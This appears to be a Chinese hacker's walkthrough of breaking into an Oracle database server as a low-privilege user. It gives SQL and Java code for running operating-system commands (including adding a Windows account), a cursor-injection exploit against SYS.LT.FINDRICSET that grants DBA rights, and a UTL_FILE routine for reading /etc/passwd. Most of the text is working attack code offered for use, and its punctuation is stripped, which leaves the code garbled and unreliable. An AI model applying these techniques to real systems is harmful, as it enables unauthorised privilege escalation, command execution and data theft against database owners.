很快便连接上oracle服务器此时发现
连接后不是dba权限
不能利用SYSDBMS_EXPORT_EXTENSIONGET_DOMAIN_INDEX_TABLES漏洞提升权限
运行SELECT UTL_HTTPrequest() FROM dual 后发现oracle服务器不能连接网络
幸运的是
运行
create or replace function Linx_Query (p varchar) return number authid current_user is begin execute immediate p; return ;end;
成功!这个用户具有create proceduce权限
此时马上想到创建java扩展执行命令
create or replace and compile java source named LinxUtil as import javaio*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( RuntimegetRuntime()exec(args)getInputStream() ) ); String stempstr=;while ((stemp = myReaderreadLine()) != null) str +=stemp+ ;myReaderclose();return str;} catch (Exception e){return etoString();}}}
begin dbms_javagrant_permission(PUBLIC SYS:javaioFilePermission <> execute );end;
create or replace function LinxRunCMD(p_cmd in varchar) return varchar as language java name LinxUtilrunCMD(javalangString) return String
select * from all_objects where object_name like %LINX%
grant all on LinxRunCMD to public
select LinxRunCMD(cmd /c net user linx /add) from dual
但是在第一步就卡住了服务器由于某种未知原因 不能创建java扩展!!
还好我们还有UTL库可以利用
create or replace function LinxUTLReadfile (filename varchar) return varchar is
fHandler UTL_FILEFILE_TYPE;
buf varchar();
output varchar();
BEGIN
fHandler := UTL_FILEFOPEN(UTL_FILE_DIR filename r);
loop
begin
utl_fileget_line(fHandlerbuf);
DBMS_OUTPUTPUT_LINE(Cursor: ||buf);
exception
when no_data_found then exit;
end;
output := output||buf||chr();
end loop;
UTL_FILEFCLOSE(fHandler);
return output;
END;
UTL_FILE_DIR需要先用
CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS /etc;
指定目但运行后发现没有权限只好想办法提权
***************游标注射***************
老外写了N个pdf介绍这技术我精简了代码
DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQLOPEN_CURSOR;
DBMS_SQLPARSE(MYCdeclare pragma autonomous_transaction; begin execute immediate GRANT DBA TO linxlinx_current_db_user;commit;end;);
DBMS_OUTPUTPUT_LINE(Cursor: ||MYC);
BEGIN SYSLTFINDRICSET(||dbms_sqlexecute( ||MYC|| )||)–x); END;
raise NO_DATA_FOUND;
EXCEPTION
WHEN NO_DATA_FOUND THEN DBMS_OUTPUTPUT_LINE(Cursor: ||MYC);
WHEN OTHERS THEN DBMS_OUTPUTPUT_LINE(Cursor: ||MYC);
END;
运行后重新连接就有dba权限了简单吧……
现在可以读取文件了
CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS /etc;
select LinxUTLReadfile(passwd) from dual
后面就简单了不写了
